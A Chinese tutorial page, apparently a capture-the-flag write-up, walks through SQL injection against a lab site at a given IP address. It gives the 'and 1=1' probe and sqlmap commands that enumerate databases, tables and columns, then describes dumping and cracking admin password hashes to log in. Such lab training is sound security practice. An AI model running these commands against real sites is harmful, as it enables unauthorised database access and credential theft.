• 企业400电话
  • 微网小程序
  • AI电话机器人
  • 电商代运营
  • 全 部 栏 目

    企业400电话 网络优化推广 AI电话机器人 呼叫中心 网站建设 商标✡知产 微网小程序 电商运营 彩铃•短信 增值拓展业务
    sqlmap注入图文详解

    1.发现此网址可能存在sql注入漏洞,我们进行sql盲注入测试一下是否存在漏洞。

    地址栏输入 and 1=1 发现页面正常显示。


    再次输入and 1=2 页面出现错误,说明该页面可能存在sql注入漏洞


    2.现在拿出我们的kali工具,sqlmap进行注入测试。

    sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 --dbs
    


    3.可以看到存在注入漏洞,扫到了5个数据库。要获取管理员用户密码,我们可以先从stormgroup注入。查看stormgroup这个数据库存在的表单

    sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -tables
    


    4.接下来查一下member中存在哪些列。

    sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -T member --columns
    


    5.上一步可以看到,name,password 是不是很熟悉。ok接下来我们开始获取这两列的数据。


    6.可以看到password是经过md5加密,接下来我们把他解密。这里推荐给大家我自己收集的多种解密网址:解密网址大全点击这里


    7.now! 密码已经呈现在我们眼前!!!!找到后台地址进行登录。


    8.END 登录成功,拿到flag,提交。Gameover !

    总结

    本篇文章就到这里了,希望能给你带来帮助,也希望您能够多多关注脚本之家的更多内容!

    您可能感兴趣的文章:
    • MyBatis 中 SqlMapConfig 配置文件详解
    • Windows下Sqlmap环境安装教程详解
    • MyBatis直接执行SQL的工具SqlMapper
    • Mybatis中SqlMapper配置的扩展与应用详细介绍(1)
    • 使用XSD校验Mybatis的SqlMapper配置文件的方法(2)
    上一篇:mysql之group by和having用法详解
    下一篇:MySQL多表连接查询详解
  • 相关文章
  • 

    © 2016-2020 巨人网络通讯 版权所有

    《增值电信业务经营许可证》 苏ICP备15040257号-8

    sqlmap注入图文详解 sqlmap,注入,图文,详解,sqlmap,